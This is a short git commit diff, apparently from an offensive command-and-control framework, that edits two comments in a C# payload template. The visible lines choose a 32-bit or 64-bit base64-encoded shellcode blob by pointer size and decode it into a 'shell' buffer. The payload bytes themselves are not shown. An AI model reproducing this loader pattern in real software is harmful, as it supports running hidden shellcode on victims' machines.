'Added CSC Output File to payloads'

chunking
benpturner 2018-10-10 14:36:10 +01:00
parent a3d0b0c887
commit 204fff0a75
1 changed files with 2 additions and 2 deletions

View File

@ -58,12 +58,12 @@ class Program
if (IntPtr.Size == 4)
{
// 32-bit
// 32-bit sc
shell = Convert.FromBase64String(safdsv32);
}
else if (IntPtr.Size == 8)
{
// 64-bit
// 64-bit sc
shell = Convert.FromBase64String(safdsv64);
}